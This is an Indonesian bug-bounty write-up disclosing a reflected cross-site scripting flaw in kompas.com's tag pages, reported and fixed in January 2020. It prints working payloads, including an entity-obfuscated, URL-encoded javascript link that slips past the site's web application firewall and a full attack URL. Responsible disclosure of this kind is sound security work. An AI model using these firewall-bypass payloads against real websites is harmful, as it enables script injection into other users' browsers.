XSS REFLECTED BYPASS WAF DI SITUS kompas.com

Hi, Bug Hunter & Kawan-kawan semua.

Kali ini saya bakalan sharing tentang XSS REFLECTED BYPASS WAF Di Situs Kompas.com.

Baiklah langsung saja ke Topiknya.

Vulnerability XSS berada di fitur TAG nya.

https://www.kompas.com/tag/test

Payload yang digunakan :

<a href=”javascript:prompt()”>CLICK</a>

Disana jika menginput tag di atas, maka akan kena WAF.

Waf Kompas.com

Dan disini saya mencoba bypass waf tersebut dengan menggunakan HTML ENTITIES .

Dan disana juga harus encode URL karena ada nya peringatan An Error Was Encountered.

Berikut beberapa tag yang harus di Encode URL untuk bypass peringatan An Error Was Encountered.

( ; ) = %3b

( ‘ ) = %27

( & ) = %26

( = ) = %3D

Final Payload bypass WAF dengan HTML ENTITIES :

<a href=”j&Tab;a&Tab;v&Tab:asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;”>Click</a>

Final Payload bypass WAF dengan HTML ENTITIES & ENCODE URL :

%3Ca%20href%3d%22j%26Tab%3ba%26Tab%3bv%26Tab%3basc%26NewLine%3bri%26Tab%3bpt%26colon%3b%26lpar%3bp%26Tab%3br%26Tab%3bo%26Tab%3bm%26Tab%3bp%26Tab%3bt%26Tab%3b%28document.domain%29%26rpar%3b%22%3ECLICK

Final URL :

https://www.kompas.com/tag/maia+estianty%22%3E%3Ca%20href%3d%22j%26Tab%3ba%26Tab%3bv%26Tab%3basc%26NewLine%3bri%26Tab%3bpt%26colon%3b%26lpar%3bp%26Tab%3br%26Tab%3bo%26Tab%3bm%26Tab%3bp%26Tab%3bt%26Tab%3b%28document.domain%29%26rpar%3b%22%3ECLICK

Pop up Kompas.com

Timeline :

Report : 2/1/2020

Fix : 11/1/2020

Rewards : -